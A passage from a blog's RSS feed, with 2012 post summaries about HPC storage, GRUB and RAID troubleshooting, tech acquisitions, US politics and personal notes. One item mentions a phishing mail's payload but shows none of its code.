      <description>This is a very cool concept, something that meshes perfectly with our Tiburon based siCluster philosophy. That is, compute nodes should boot diskless, there should be very little state on each node, and stuff that you need to do should be made absolutely as simple as possible. SmartOS is a project of Joyent. Joyent, for those not familiar with them, are a cloud company, building a nice public cloud for end users to build on.</description>
    </item>
    
    <item>
      <title>Dear DEA ...</title>
      <link>https://blog.scalability.org/2012/08/dear-dea/</link>
      <pubDate>Mon, 20 Aug 2012 19:58:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/08/dear-dea/</guid>
      <description>According to this you don&amp;rsquo;t have enough high performance storage for your analyses.
First off, no, it&amp;rsquo;s not expensive. You are just using the wrong vendors. Second off &amp;hellip; please &amp;hellip; PLEASE &amp;hellip; call us. We&amp;rsquo;d be happy to hook you up with Petabytes for the price you are likely paying for Terabytes. Seriously. Our units are inexpensive enough that you could buy them, replicate the data across them, and then store them.</description>
    </item>
    
    <item>
      <title>one of the curious features of our history</title>
      <link>https://blog.scalability.org/2012/08/one-of-the-curious-features-of-our-history/</link>
      <pubDate>Sun, 19 Aug 2012 15:39:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/08/one-of-the-curious-features-of-our-history/</guid>
      <description>This is about learning, not from mistakes, but from a &amp;hellip; well &amp;hellip; empirical approach to &amp;ldquo;partnerships&amp;rdquo;. When I started up the company 10 years ago, we weren&amp;rsquo;t on anyone&amp;rsquo;s radar. Self funded, running out of my basement. Yeah, real big threat there. I noticed something though. During our time operating, first as an LLC, then as an Inc., we attracted a range of &amp;hellip; er &amp;hellip; partners and others. Many of whom would come to try to, for lack of a more accurate way to phrase this, pry ideas, plans, and IP/designs out of us.</description>
    </item>
    
    <item>
      <title>grub drive enumeration</title>
      <link>https://blog.scalability.org/2012/08/grub-drive-enumeration/</link>
      <pubDate>Fri, 17 Aug 2012 15:34:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/08/grub-drive-enumeration/</guid>
      <description>So there you are, helping a customer out with a problem. They&amp;rsquo;ve just added in a replacement OS disk using your process. At the end of the process is a bit of &amp;hellip; well &amp;hellip; an insurance procedure. Make sure grub is correctly on each drive in the RAID1. The grub.conf file has root (hd0,0) kernel .... root=/dev/md0 ... initrd ... Makes sense, right? Cause hd0 enumerates to the first bios drive used for booting in the boot list.</description>
    </item>
    
    <item>
      <title>What does &#34;forever&#34; really mean for a company?  And its implications for clouds ... and business models ...</title>
      <link>https://blog.scalability.org/2012/08/what-does-forever-really-mean-for-a-company-and-its-implications-for-clouds-and-business-models/</link>
      <pubDate>Thu, 16 Aug 2012 19:25:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/08/what-does-forever-really-mean-for-a-company-and-its-implications-for-clouds-and-business-models/</guid>
      <description>Note: in advance, this is not a slam on the company I will mention. I actually agree with their migration concept, even if I disagree with the details. In the early days of their life, Joyent made a lifetime offer for goods and services. These were pretty reasonable offerings, and the hook of
How long is it good for? As long as we exist.  As in &amp;hellip; forever. But what does &amp;ldquo;forever&amp;rdquo; actually mean?</description>
    </item>
    
    <item>
      <title>More M&amp;A:  IBM snarfs up Texas Memory Systems</title>
      <link>https://blog.scalability.org/2012/08/more-ma-ibm-snarfs-up-texas-memory-systems/</link>
      <pubDate>Thu, 16 Aug 2012 14:02:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/08/more-ma-ibm-snarfs-up-texas-memory-systems/</guid>
      <description>We knew that TMS was looking for a buyer. And IBM is a very intelligently run company; they see how the technologies are changing. IBM has grabbed TMS. This alters a bunch of playing fields. There is a shrinking pool of players still available. Virident, STEC, and a few others. OCZ is occasionally rumored to be talking to Seagate and others. With TMS, IBM can now offer TMS metadata servers for GPFS, integrated.</description>
    </item>
    
    <item>
      <title>More M&amp;A: TCS grabs CRL</title>
      <link>https://blog.scalability.org/2012/08/more-ma-tcs-grabs-crl/</link>
      <pubDate>Thu, 16 Aug 2012 13:55:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/08/more-ma-tcs-grabs-crl/</guid>
      <description>TCS is arguably one of the more successful services groups out there. Cloud computing naturally fits into this, as cloud is AAS (As A Service). CRL has a localized bit of expertise in Pune, as well as customers pretty widely spread out. We&amp;rsquo;ve worked with them in the past, and they have some of our gear. Dr. Vipin Chaudhary, CEO of CRL, is a good friend and business partner going back a ways.</description>
    </item>
    
    <item>
      <title>Day job will be at HPC on Wall Street conference in NYC 19-Sept</title>
      <link>https://blog.scalability.org/2012/08/day-job-will-be-at-hpc-on-wall-street-conference-in-nyc-19-sept/</link>
      <pubDate>Wed, 15 Aug 2012 02:31:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/08/day-job-will-be-at-hpc-on-wall-street-conference-in-nyc-19-sept/</guid>
      <description>Still deciding what to bring &amp;hellip; at least one thing new (we have a number). Will have at least one partner in the booth, possibly more. Will be right by the coffee !!!! I can hook an IV straight from there &amp;hellip; Very excited! More info soon.</description>
    </item>
    
    <item>
      <title>OT:  Canton MI Olympian and an Olympian hopeful</title>
      <link>https://blog.scalability.org/2012/08/ot-canton-mi-olympian-and-an-olympian-hopeful/</link>
      <pubDate>Wed, 15 Aug 2012 01:51:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/08/ot-canton-mi-olympian-and-an-olympian-hopeful/</guid>
      <description>Took off work early to take family (and Captain!) to see Allison Schmitt at Canton&amp;rsquo;s Heritage Park. For those who don&amp;rsquo;t know, Allison won 3 gold medals, a silver, and a bronze at the 2012 Olympics in London. We watched 2 of her races, most of Ryan Lochte&amp;rsquo;s, Michael Phelps, and as many of the swimming contests as NBC broadcast (sadly not enough). My wife and I enjoyed the races, and, as it turns out, so did my daughter.</description>
    </item>
    
    <item>
      <title>As a service: the rapidly changing face of HPC</title>
      <link>https://blog.scalability.org/2012/08/as-a-service-the-rapidly-changing-face-of-hpc/</link>
      <pubDate>Mon, 13 Aug 2012 19:24:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/08/as-a-service-the-rapidly-changing-face-of-hpc/</guid>
      <description>Our market is often inundated with buzzwords. And fads sweep through organizations looking for silver bullets to their very hard problems. Some of these problems are self-inflicted &amp;hellip; some are as a result of growth, or needed infrastructure change. One of the biggest problems with HPC (and to a degree, storage) has been the high up-front costs to build what you need. You have to lay down capital to buy something, which may or may not have an ROI adequate to pay for it.</description>
    </item>
    
    <item>
      <title>OT:  Welcome to the newest member of our family</title>
      <link>https://blog.scalability.org/2012/08/ot-welcome-to-the-newest-member-of-our-family/</link>
      <pubDate>Mon, 13 Aug 2012 03:19:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/08/ot-welcome-to-the-newest-member-of-our-family/</guid>
      <description>Captain is a rescue dog from the CHAINED Inc. organization. He is the dog on the right at 1:21. His sister is the dog on the left of that frame.
[ ](/images/captain.jpg)
Captain is a 9 month old or so yellow lab. He was badly abused. He has major trust issues, and I don&amp;rsquo;t blame him for this. It will take time to learn to trust. He&amp;rsquo;s been with us 5 days now, and loves my wife and daughter.</description>
    </item>
    
    <item>
      <title>Beautiful smackdown</title>
      <link>https://blog.scalability.org/2012/08/beautiful-smackdown/</link>
      <pubDate>Thu, 09 Aug 2012 20:23:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/08/beautiful-smackdown/</guid>
      <description>This is epic. As originally seen on @mndoci &amp;rsquo;s twitter stream. Short version: Those who don&amp;rsquo;t have a clue, really &amp;hellip; REALLY &amp;hellip; shouldn&amp;rsquo;t write lengthy journal articles about what they don&amp;rsquo;t have a clue about. Lest they get smacked down. Like this. For some reason, it&amp;rsquo;s an article of faith for many people, who largely do not understand why, that the big drug companies are EEEEVVIIIILLL (hope I used enough I&amp;rsquo;s there).</description>
    </item>
    
    <item>
      <title>Whats old is new again</title>
      <link>https://blog.scalability.org/2012/08/whats-old-is-new-again/</link>
      <pubDate>Thu, 09 Aug 2012 02:36:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/08/whats-old-is-new-again/</guid>
      <description>Inspired by this article. Back in the dim and distant past, when I started graduate school &amp;hellip; no before that &amp;hellip; I had something of an &amp;hellip; naive &amp;hellip; world and economic view. This view had me believing that newly minted physics Ph.D. types would be able to find a nice tenure track relatively easily after a short postdoc. From there to professional career bliss. Do research, write grants, publish, teach.</description>
    </item>
    
    <item>
      <title>Cool hack attempt ...</title>
      <link>https://blog.scalability.org/2012/08/cool-hack-attempt/</link>
      <pubDate>Mon, 06 Aug 2012 20:54:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/08/cool-hack-attempt/</guid>
      <description>This one was actually much harder to discern as a hack attempt until I looked at the payload in an editor. Never EVER under any circumstances read HTML mail from a source you don&amp;rsquo;t trust &amp;hellip; and I am getting ready to say, from anyone. Here is a portion of the payload: `</description>
    </item>
    
    <item>
      <title>So much #fail in the RHEL init process</title>
      <link>https://blog.scalability.org/2012/08/so-much-fail-in-the-rhel-init-process/</link>
      <pubDate>Fri, 03 Aug 2012 20:55:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/08/so-much-fail-in-the-rhel-init-process/</guid>
      <description>It&amp;rsquo;s borked so incredibly badly that in order to support what we need, we have to hack around all its brokenness. Dracut is a step up, but pretty much everything else (and this may be a dracut issue) is borked. We want one initramfs to support software RAID1 boot, network boot, iscsi boot. But you have to pull in so many modules to get this to work &amp;hellip; we have gigantic initramfs that take forever to assemble.</description>
    </item>
    
    <item>
      <title>We built that:  10 years in business</title>
      <link>https://blog.scalability.org/2012/08/we-built-that-10-years-in-buiness/</link>
      <pubDate>Thu, 02 Aug 2012 02:24:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/08/we-built-that-10-years-in-buiness/</guid>
      <description>[warning: longer post] I mentioned this on twitter (@sijoe). The day job has been in business for 10 years. We&amp;rsquo;ve not taken outside investment to date, and we&amp;rsquo;ve not sold the company yet. We&amp;rsquo;ve been profitable and growing continuously during our lifetime. The preceding 3 years have seen growth, accelerating hard. The company was built starting with a conviction that practitioners and users of HPC systems needed better designs, better systems than were being pushed out by traditional vendors in the early 2000&amp;rsquo;s.</description>
    </item>
    
    <item>
      <title>the mystery of the week</title>
      <link>https://blog.scalability.org/2012/08/the-mystery-of-the-week/</link>
      <pubDate>Wed, 01 Aug 2012 05:31:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/08/the-mystery-of-the-week/</guid>
      <description>Customer has had a machine for a while. Generally stable. Followed our advice on doing a reboot recently. Unit started crashing Monday. Then today. Hard to stay up and stable. I asked if anything has changed, and haven&amp;rsquo;t gotten anything conclusive &amp;hellip; mostly &amp;ldquo;we don&amp;rsquo;t think so&amp;rdquo;. About the crashes: Nothing in the logs. Not a thing. No hardware subsystem with logging enabled (RAID, motherboard, PCIe, IPMI, &amp;hellip;) reports an error.</description>
    </item>
    
    <item>
      <title>... and Oracle snarfs up Xsigo ...</title>
      <link>https://blog.scalability.org/2012/07/and-oracle-snarfs-up-xsigo/</link>
      <pubDate>Tue, 31 Jul 2012 16:26:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/and-oracle-snarfs-up-xsigo/</guid>
      <description>Xsigo makes virtual network connectivity systems. Basically letting you build a virtual network, in a software stack, so you can avoid spending so much money on a fixed (and inflexible) network stack. It&amp;rsquo;s a neat concept, but its utility is focused elsewhere than HPC. Even though they talk storage, I&amp;rsquo;d argue it&amp;rsquo;s a fairly expensive way to build a network for storage as well &amp;hellip; though if you are going to be changing your network all the time, it actually might be a win.</description>
    </item>
    
    <item>
      <title>... and he&#39;s back!</title>
      <link>https://blog.scalability.org/2012/07/and-hes-back/</link>
      <pubDate>Mon, 30 Jul 2012 15:15:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/and-hes-back/</guid>
      <description>with a good article on a new license formulated for genomic code being distributed by a university research center. Glad to see the blog back up! Or rebooted &amp;hellip; and +10 on your article. It (that license) is the wrong direction IMO. Goes against what publicly funded scientific code should be distributed as (IMO).</description>
    </item>
    
    <item>
      <title>More M&amp;A?</title>
      <link>https://blog.scalability.org/2012/07/more-ma/</link>
      <pubDate>Sun, 29 Jul 2012 04:05:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/more-ma/</guid>
      <description>I&amp;rsquo;ve heard OCZ being looked at by Seagate and others. That would make sense. Honestly I think my expectations are not that companies have fire sales going on &amp;hellip; but that areas where some sort of force multiplication is possible &amp;hellip; these companies will be snapped up to help grow larger companies. Acquirers are after a few things. Value in terms of market, products, people, technology and capability, fit, etc. I do expect to see a few fire sales, but not many.</description>
    </item>
    
    <item>
      <title>A question a customer asked relative to Lustre and the Whamcloud acquisition</title>
      <link>https://blog.scalability.org/2012/07/a-question-a-customer-asked-relative-to-lustre-and-the-whamcloud-acquisition/</link>
      <pubDate>Sun, 29 Jul 2012 03:41:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/a-question-a-customer-asked-relative-to-lustre-and-the-whamcloud-acquisition/</guid>
      <description>What&amp;rsquo;s to become of Chroma (from Whamcloud)? I know it&amp;rsquo;s early, and I am sure that there won&amp;rsquo;t be answers just yet. Intel acquired Cilk, and it&amp;rsquo;s now available (and being integrated into gcc!) Intel acquired many others, and their bits are available. I&amp;rsquo;d expect Chroma to be made into an offering from Intel, along the lines of their cluster suite. Fully integrated stack. I know some folks are nervous about the acquisition.</description>
    </item>
    
    <item>
      <title>Some kernels don&#39;t like having non-assemble-able software RAIDs</title>
      <link>https://blog.scalability.org/2012/07/some-kernels-dont-like-having-non-assemble-able-software-raids/</link>
      <pubDate>Sun, 29 Jul 2012 03:00:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/some-kernels-dont-like-having-non-assemble-able-software-raids/</guid>
      <description>This one took me a while to figure out. I had to start probing why a system would crash the MD stack shortly after booting, but not in single user mode. So I started delving into the RAID. And found that the folks who set this unit up had a RAID0 with 0.90 metadata on the devices, and then 1.2 metadata on the MDS. So along comes the Lustre-ized kernel, and whammo.</description>
    </item>
    
    <item>
      <title>ahh grub 0.97 &#43; ext4 ... how I loathe thee</title>
      <link>https://blog.scalability.org/2012/07/ahh-grub-0-97-ext4-how-i-loathe-thee/</link>
      <pubDate>Fri, 27 Jul 2012 03:25:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/ahh-grub-0-97-ext4-how-i-loathe-thee/</guid>
      <description>I had forgotten that some combinations of grub + file system could be rendered unbootable without lots of additional help. Grub is annoying. This is Grub legacy. Grub current tries to fix the mess, but fails as it is overly complex. And it appears to omit PXE and network boot options. Well iPXE helps us there. This is why we like tiburon so much. No installation. No problem. No grub to worry about.</description>
    </item>
    
    <item>
      <title>bad design &#43; bad implementation = company success ???  Seriously ???</title>
      <link>https://blog.scalability.org/2012/07/bad-design-bad-implementation-company-success-seriously/</link>
      <pubDate>Fri, 27 Jul 2012 03:05:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/bad-design-bad-implementation-company-success-seriously/</guid>
      <description>We are often hired to work on existing systems, to see if we can help make them faster and better. I am working on such a project now, but this post is not about this project. I&amp;rsquo;ve noticed a tendency in the market to shoehorn a set of designs for storage/computing systems into areas they weren&amp;rsquo;t designed for. Moreover, these designs would have been right at home 15 years ago; since then, far better scale-out designs have come along which do a much better job than the older designs.</description>
    </item>
    
    <item>
      <title>hits bottom, digs deeper</title>
      <link>https://blog.scalability.org/2012/07/hits-bottom-keeps-digging/</link>
      <pubDate>Thu, 26 Jul 2012 23:52:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/hits-bottom-keeps-digging/</guid>
      <description>[update] below the fold and video. I can only conclude at this point that the &amp;ldquo;don&amp;rsquo;t get it&amp;rdquo; disease runs deep and wide in this administration. [update 2] This at the WSJ encapsulates what we are observing. This has gone beyond painful to watch to embarrassing. The president now claims that his statements were sliced and diced. He now is saying that he believes that businesses built themselves, while claiming that his earlier statement was taken out of context.</description>
    </item>
    
    <item>
      <title>why do people double down when they are wrong?</title>
      <link>https://blog.scalability.org/2012/07/why-do-people-double-down-when-they-are-wrong/</link>
      <pubDate>Wed, 25 Jul 2012 04:12:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/why-do-people-double-down-when-they-are-wrong/</guid>
      <description>And do it again,
&amp;hellip; sooooo &amp;hellip;. a public works project (bridge, dam, &amp;hellip;) is equivalent in his eyes to &amp;hellip;. a risk an entrepreneur takes? Seriously?
Erp &amp;hellip;. it&amp;rsquo;s glaringly obvious who does not have an understanding. The worker in the private sector punches the clock BECAUSE somewhere, somewhen, the entrepreneur had the idea, took the risk, entirely upon themselves, and built something. The &amp;ldquo;public sector&amp;rdquo; is a cost, something to be kept as small as possible so as not to drive those paying the public sector&amp;rsquo;s bills into the poor house.</description>
    </item>
    
    <item>
      <title>How I&#39;d like politicians to view entrepreneurs</title>
      <link>https://blog.scalability.org/2012/07/how-id-like-politicians-to-view-entrepreneurs/</link>
      <pubDate>Mon, 23 Jul 2012 14:38:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/how-id-like-politicians-to-view-entrepreneurs/</guid>
      <description>Wonderful post by Jim Pethokoukis, covering a talk made by Ronald Reagan years ago.
and
I will freely admit that I was (almost) completely wrong in my original impressions of Reagan. I had a different political outlook in those days, and I had trouble viewing the guy as getting it. But get it, he did. This change in perception comes mostly from a maturing and a rethinking of my own world view.</description>
    </item>
    
    <item>
      <title>Putting 2 and 2 together, hopefully getting 4</title>
      <link>https://blog.scalability.org/2012/07/putting-2-and-2-together-hopefully-getting-4/</link>
      <pubDate>Mon, 23 Jul 2012 01:00:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/putting-2-and-2-together-hopefully-getting-4/</guid>
      <description>I&amp;rsquo;ve been long bothered by serious people espousing ideas not well correlated with reality, as representing reality, and telling us not to believe our lying eyes or instruments. This is in a context of (catastrophic) AGW (call this CAGW). I don&amp;rsquo;t have any dogs in that race, nor in fracking, which uses hydrological mechanisms to extract hydrocarbon fuel precursors from underground reservoirs. I am very interested in sound science, and sound policy derived from either sound science, or as close to intelligently constructed policy as we can make.</description>
    </item>
    
    <item>
      <title>... and now the cartoons ...</title>
      <link>https://blog.scalability.org/2012/07/and-now-the-cartoons/</link>
      <pubDate>Sun, 22 Jul 2012 17:29:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/and-now-the-cartoons/</guid>
      <description>below the fold. Snarfed from many places on the net. Copyrights are owned by their respective owners. I don&amp;rsquo;t know all the correct attributions, so if you find/know of it, please let me know so I can correctly update the list.
The few remaining defenders of this failed statement and meme are all parroting seemingly, the exact same talking points. Now why would that be? Most everyone else, regardless of political affiliation realizes what a complete mess this has become &amp;hellip; well &amp;hellip; those outside of the media.</description>
    </item>
    
    <item>
      <title>OT: things taken for granted, and relearned</title>
      <link>https://blog.scalability.org/2012/07/ot-things-taken-for-granted-and-relearned/</link>
      <pubDate>Sun, 22 Jul 2012 12:59:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/ot-things-taken-for-granted-and-relearned/</guid>
      <description>Sleep is the great rejuvenator. When you get good sleep, you feel generally much better when you wake up. Your body does repair functions, your brain works out (some issues). And occasionally you dream. Going without sleep ages people, makes them less productive as they are more tired during the day. It limits the repair functionality. It hinders the &amp;ldquo;work through problems&amp;rdquo;. It prevents dreams. Pulling all-nighters is one instance of doing without sleep.</description>
    </item>
    
    <item>
      <title>Insanely funny comedic response to &#34;you didn&#39;t build that&#34;</title>
      <link>https://blog.scalability.org/2012/07/insanely-funny-comedic-response-to-you-didnt-build-that/</link>
      <pubDate>Sun, 22 Jul 2012 00:45:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/insanely-funny-comedic-response-to-you-didnt-build-that/</guid>
      <description>This past week saw the president of the US in another major screw up &amp;hellip; one he doesn&amp;rsquo;t quite understand why it&amp;rsquo;s a screw up &amp;hellip; and many of his supporters don&amp;rsquo;t quite seem to get it either. The responses to the screw up have been coming fast and furious. This has become a major issue of the campaign now, about &amp;ldquo;getting it&amp;rdquo;. It&amp;rsquo;s as defining as &amp;ldquo;it&amp;rsquo;s the economy, stupid&amp;rdquo;, and specifically as to what the economy is.</description>
    </item>
    
    <item>
      <title>Economic headwinds being reported</title>
      <link>https://blog.scalability.org/2012/07/economic-headwinds-being-reported/</link>
      <pubDate>Sun, 22 Jul 2012 00:05:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/economic-headwinds-being-reported/</guid>
      <description>HPC is a small fraction of the total computing market. The market in general experiences forces from the state of the economy &amp;hellip; in growing economic times, generally large portions of the computing market are refreshing and updating gear. Conversely, when we are treading water, or contracting as an economy, word from on high in IT organizations is usually &amp;ldquo;make do with what you have&amp;rdquo; for a while. Many industries and economists have noted signs portending a downturn over the past few months.</description>
    </item>
    
    <item>
      <title>SSaaS ... huh... what?</title>
      <link>https://blog.scalability.org/2012/07/ssaas-huh-what/</link>
      <pubDate>Thu, 19 Jul 2012 18:49:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/ssaas-huh-what/</guid>
      <description>On James Cuff&amp;rsquo;s blog, a nice post about utilization of software. In it he writes:
to which I say &amp;hellip;
Human Voice Clip Female Young Woman Exclamations Oh Man
Seriously &amp;hellip; I gave up on indentation as a form of program structure when I stopped doing much Fortran. Sheesh. What&amp;rsquo;s next &amp;hellip; everyone using BASIC, with a little OO wrapper, a JIT, and an LLVM backend to run on GPUs (with a VHDL conversion tool)?</description>
    </item>
    
    <item>
      <title>Seriously enjoying playing with the Julia language</title>
      <link>https://blog.scalability.org/2012/07/seriously-enjoying-playing-with-the-julia-language/</link>
      <pubDate>Thu, 19 Jul 2012 18:08:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/seriously-enjoying-playing-with-the-julia-language/</guid>
      <description>See here. Parallel and distributed computing, not as an afterthought, but reasonably well integrated. Even better would be loops and vector ops which handled parallelism completely transparently &amp;hellip; which &amp;hellip; they effectively do in some cases. While waiting on static compilers, the language uses an LLVM backend. There&amp;rsquo;s even a hook to generate code for PTX targets. No more separate language needed for the GPU. Just run your code and it takes advantage of the computational resources, regardless of their asymmetric nature.</description>
    </item>
    
    <item>
      <title>Gaak ... this is why we like tiburon</title>
      <link>https://blog.scalability.org/2012/07/gaak-this-is-why-we-like-tiburon/</link>
      <pubDate>Thu, 19 Jul 2012 17:59:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/gaak-this-is-why-we-like-tiburon/</guid>
      <description>Finishing up building and testing a Ceph system for a customer. Unfortunately, due to another technical issue, we couldn&amp;rsquo;t simply encode the config in tiburon finishing scripts. The technical issue: the current tiburon master system is in use by another project, and since we don&amp;rsquo;t have a spare system to build a mirror of it (going to change this soon), we are stuck using an older, more rudimentary version of the system.</description>
    </item>
    
    <item>
      <title>GlusterFS and RDMA support</title>
      <link>https://blog.scalability.org/2012/07/glusterfs-and-rdma-support/</link>
      <pubDate>Mon, 16 Jul 2012 19:40:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/glusterfs-and-rdma-support/</guid>
      <description>[update] In 3.3.1/3.3.2 This appeared in the 3.3.0 docs. &amp;ldquo;NOTE: with 3.3.0 release, transport type &amp;lsquo;rdma&amp;rsquo; and &amp;lsquo;tcp,rdma&amp;rsquo; are not fully supported.&amp;rdquo; On page 133 of the Admin Guide. We&amp;rsquo;ve been noting breakage with support since the 3.0.x days. I think there were varying factions within the company that wanted pure tcp, and some wanted RDMA included. The latter is what HPC folks use for their storage. GlusterFS is going in a decidedly non-HPC direction, which is fine.</description>
    </item>
    
    <item>
      <title>9 years and 351 days</title>
      <link>https://blog.scalability.org/2012/07/9-years-and-354-days/</link>
      <pubDate>Mon, 16 Jul 2012 17:07:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/9-years-and-354-days/</guid>
      <description>[updated to get the count right] That&amp;rsquo;s how long the day job has been in business. Our 10 year anniversary is 1-August. I started this business 10 years ago, in part to scratch an itch, but really because I believed strongly in the HPC market. I still do, though our view of the market has evolved, and we look at how it&amp;rsquo;s been evolving with a mixture of joy and trepidation. Trepidation in part because we&amp;rsquo;ve been pretty good at predicting what comes next, and sadly have not been able to raise the capital needed to build in that area (at least previously).</description>
    </item>
    
    <item>
      <title>Why business models for HPC are so very important</title>
      <link>https://blog.scalability.org/2012/07/why-business-models-for-hpc-are-so-very-important/</link>
      <pubDate>Sun, 15 Jul 2012 21:21:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/why-business-models-for-hpc-are-so-very-important/</guid>
      <description>You need a sound business model. Not a sound business plan, but a concept of where revenue comes from, how you will profit from it, and what your costs are, before you build and sell a product. In the case of state sponsored infrastructure, any model that looks like this:
 1. Build it 2. ??? 3. Profit!  is a failure waiting to happen. It&amp;rsquo;s not a business model.</description>
    </item>
    
    <item>
      <title>OT:  I want to comment on this ...</title>
      <link>https://blog.scalability.org/2012/07/ot-i-want-to-comment-on-this/</link>
      <pubDate>Sun, 15 Jul 2012 20:04:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/ot-i-want-to-comment-on-this/</guid>
      <description>[update] Good for them, the NFIB hits back, hard. No mental gymnastics required to correctly interpret what was said. Further, they back it up with almost identical quotes from Elizabeth Warren herself, who appears to be the originator of this epic failure of a meme. This entire meme deserves all the derision being heaped on it. [update 2] And the pile on begins in earnest. James Pethokoukis (economics blogger and many other things) has some good comments of his own, as well as from others.</description>
    </item>
    
    <item>
      <title>huge dependency radii, or why I stopped using Catalyst</title>
      <link>https://blog.scalability.org/2012/07/huge-dependency-radii-or-why-i-stopped-using-catalyst/</link>
      <pubDate>Sun, 15 Jul 2012 03:04:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/huge-dependency-radii-or-why-i-stopped-using-catalyst/</guid>
      <description>More than a year ago, we were working on (re)developing some code for the UI for our units. The original UI code had been written in the Catalyst framework, an MVC system for Perl. I like Perl; it makes rapid application development easy and reasonably painless. CPAN makes avoiding coding things yourself pretty easy. Short side trip: a dependency radius is a measure of the number of additional things, unrelated to your source code itself, required to build or operate your program.</description>
    </item>
    
    <item>
      <title>... and Whamcloud is snarfed up by Intel ...</title>
      <link>https://blog.scalability.org/2012/07/and-whamcloud-is-snarfed-up-by-intel/</link>
      <pubDate>Fri, 13 Jul 2012 22:30:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/and-whamcloud-is-snarfed-up-by-intel/</guid>
      <description>See here
First off, congratulations to Brent, Eric, and everyone at Whamcloud. I had thought that the BI/Big Data side of things could prove interesting for them, and might put them in play. I hadn&amp;rsquo;t realized how quickly this would be the case. Second, Big Data is huge. Lustre, which is effectively Whamcloud&amp;rsquo;s product (ignoring IP ownership, yadda yadda &amp;hellip;), can play there, though it needs some serious additional work. But with the acquisition, I&amp;rsquo;d argue that the multithreading MDS and ODS are not far off.</description>
    </item>
    
    <item>
      <title>OT:  Just brilliant</title>
      <link>https://blog.scalability.org/2012/07/ot-just-brilliant/</link>
      <pubDate>Sat, 07 Jul 2012 04:20:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/ot-just-brilliant/</guid>
      <description>Been a Thunderbird email client user since 2004. Dropped Evolution in favor of Thunderbird; it just worked, everywhere, the same. Around the 2009-2010 time period, Mozilla decided to refocus Thunderbird. Pull resources from it. This didn&amp;rsquo;t work out well, as users protested rather intensely. Looks like they are about to do it again, specifically to start chasing the mobile market. This letter on pastebin &amp;hellip; and the priceless commentary afterwards, yeah &amp;hellip; says it all.</description>
    </item>
    
    <item>
      <title>Just configured a new generation storage unit ...</title>
      <link>https://blog.scalability.org/2012/07/just-configured-a-new-generation-storage-unit/</link>
      <pubDate>Fri, 06 Jul 2012 16:29:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/just-configured-a-new-generation-storage-unit/</guid>
      <description>4U, 256TB raw, fire breathing, monstrously fast unit. Our existing 5U units already leave competitors&amp;rsquo; single units, never mind their storage clusters, deep in the dust, and falling rapidly behind. Next gen isn&amp;rsquo;t incremental change. It&amp;rsquo;s big. Huge even. Density and performance that boggle my mind, and we&amp;rsquo;ve set some pretty serious records for performance (5.6 GB/s read, 4.5 GB/s write for spinning disk) with the existing kit. And you will see these very soon.</description>
    </item>
    
    <item>
      <title>Presenting the Higgs boson</title>
      <link>https://blog.scalability.org/2012/07/presenting-the-higgs-boson/</link>
      <pubDate>Thu, 05 Jul 2012 03:51:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/presenting-the-higgs-boson/</guid>
      <description>Reuters has an article on it here. It hasn&amp;rsquo;t been my area of work for a while, but I had a few friends (postdocs, etc.) working on it (in a theoretical sense). One quit high energy physics to work on the &amp;ldquo;muck left over after the big bang&amp;rdquo;. The latter is where the money and jobs are; the former is for those who get lucky and find an academic home. I find it funny how reporters tend to paint groups with broad strokes.</description>
    </item>
    
    <item>
      <title>What to think about cloud outages</title>
      <link>https://blog.scalability.org/2012/06/what-to-think-about-cloud-outages/</link>
      <pubDate>Sat, 30 Jun 2012 15:55:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/06/what-to-think-about-cloud-outages/</guid>
      <description>EC2 was taken down by the storms running across the US. Parts of EC2 were, anyway. And it took down Netflix and others. Hmmmm. We put our web and mail into EC2 specifically to avoid these sorts of problems. While we are working on getting our second line up on a different technology from our primary, we are leaving it in the cloud. As I&amp;rsquo;ve said many times &amp;hellip; there ain&amp;rsquo;t no such thing as a silver bullet or a free lunch.</description>
    </item>
    
    <item>
      <title>OT: my reading list ...</title>
      <link>https://blog.scalability.org/2012/06/ot-my-reading-list/</link>
